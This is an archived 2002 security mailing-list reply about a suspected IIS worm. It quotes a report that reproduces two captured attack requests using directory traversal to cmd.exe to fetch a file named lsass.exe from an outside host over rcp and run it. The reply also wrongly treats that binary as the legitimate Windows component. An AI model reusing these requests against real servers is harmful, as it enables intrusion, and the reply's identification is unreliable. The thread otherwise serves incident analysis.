Security Incidents mailing list archives
Re: new IIS worm? (rcp lsass.exe)
From: Michael Thompson <mike () thompsonmike co uk>
Date: Mon, 23 Sep 2002 01:25:30 +0100
Hello Christian, On Sat, 21 Sep 2002, at 20:17:48 [GMT +0200] (which was 19:17 in my TimeZone) you wrote: CM> hi, CM> since about a week I notice attempts to exploit vulnerable IIS installations CM> (they show up with snort's "WEB-IIS multiple decode attempt" signature) CM> that seems to try and load an "lsass.exe" file via rcp. CM> As a search of google and securityfocus turned up nothing, I'll throw in CM> what I gathered so far and ask if anybody can identify this: (it seems CM> the affected customer's systems weren't vulnerable, so I don't know what CM> the worm's further actions are). CM> The first part is a SYN scan for port 80, with the source port set to 80, CM> differing ACK numbers, but the same ISN. Interestingly, it iterates over CM> the 3rd IP address octet first, and the 4th later, probably to make the scan CM> on the single /24 slower and less noticeable (in the case I've seen, it CM> has some 30 seconds between packets to consecutive addresses). CM> Then it seems to go after the web servers, sending the following: CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0.. CM> and CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0 CM> I've been able to get hold of that lsass.exe binary (9728 bytes), but CM> I lack the skills to analyze it; I'll happily mail it to anybody who asks. CM> Yes, and the IP addresse doing the scanning + exploit attempts is different CM> from the one which provides lsass.exe; the scanning machine seems to be CM> a solaris 2.7 default install, the rcp-server seems to be solaris 2.8. CM> regards, CM> cm. lsass.exe is the Microsoft Secure Storage for 2000/NT and XP. It is responsable for managing secure storage in those enviroments. -- Best regards, Michael http://wwww.thompsonmike.co.uk/ PGP KeyID := 0x3CC985FA I just can't put it down. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- new IIS worm? (rcp lsass.exe) Christian Mock (Sep 22)
- Re: new IIS worm? (rcp lsass.exe) Björn Wallentinus (Sep 22)
- Re: new IIS worm? (rcp lsass.exe) Michael Thompson (Sep 23)
- Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Mike Lewinski (Sep 23)
- Re: new IIS worm? (rcp lsass.exe) Lasse Sundström (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 23)
- <Possible follow-ups>
- Re: new IIS worm? (rcp lsass.exe) Mike Lewinski (Sep 23)
- Re: new IIS worm? (rcp lsass.exe) pj (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Bellenger, Bruno (Paris) (Sep 24)
- Slapper worm DoS james (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Mike Lewinski (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Eloy A. Paris (Sep 24)
(Thread continues...)